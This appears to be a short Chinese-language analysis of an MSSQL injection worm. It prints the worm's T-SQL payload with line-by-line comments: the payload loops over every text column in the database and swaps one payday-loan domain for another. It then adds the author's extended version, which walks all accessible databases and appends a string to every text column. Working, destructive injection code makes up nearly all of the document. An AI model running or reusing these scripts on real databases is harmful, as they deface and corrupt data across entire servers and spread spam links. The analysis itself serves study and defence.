MSSQL 蠕虫分析

set ansi_warnings off
-- @T和@C变量分别用来存储表名和列名
DECLARE @T VARCHAR(255),@C VARCHAR(255)
-- Table_Cursor 是个游标变量，用来保存后面查询语句的游标
DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME
-- INFORMATION_SCHEMA.columns 和 INFORMATION_SCHEMA.tables 保存了当前库的元数据——表名和列名
from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t
-- 由于是要插入广告，所以必须要找字符串和 text 类型的列
where c.DATA_TYPE in ('nvarchar','varchar','ntext','text')
-- 允许字符长度太小的列无法插广告，所以长度也有要求
and c.CHARACTER_MAXIMUM_LENGTH>10
and t.table_name=c.table_name
and t.table_type='BASE TABLE'

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
-- 遍历查询结果，然后执行 UPDATE 操作，把找到“corypaydayloans.com”的全部替换成“maxxpaydayloans.com”，这是竞争对手干的吧？
WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''corypaydayloans.com'', ''maxxpaydayloans.com'') where ['+@C+'] like ''%corypaydayloans.com%'' ')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

-- 请勿用于非法用途

DECLARE @d varchar(100);
DECLARE @dbc cursor
set @dbc=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());
open @dbc
fetch next from @dbc into @d
WHILE(@@FETCH_STATUS=0)
BEGIN
declare @sql nvarchar(1000);
-- 因为直接执行 exec('use '+@d) 后再执行时无效的，所以只有全部放字符串里
set @sql = N'
use '+@d+';
declare @tc cursor;
declare @t varchar(100);
declare @c varchar(100);
declare @sql varchar(100);
set @tc=cursor for select c.TABLE_NAME,c.COLUMN_NAME
from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t
where c.data_type in (''nvarchar'', ''varchar'', ''ntext'', ''text'')
and c.character_maximum_length > 10
and t.table_name=c.table_name
and t.table_type=''BASE TABLE'';

open @tc;
fetch next from @tc into @t, @c;
while(@@fetch_status=0)
begin
set @sql = ''update [''+@t+''] set [''+@c+'']=[''+@c+'']+''''test MSSQL Worm'''';'';
exec(@sql);
fetch next from @tc into @t, @c;
end
close @tc
'
exec sp_executesql @sql;
fetch next from @dbc into @d
END
CLOSE @dbc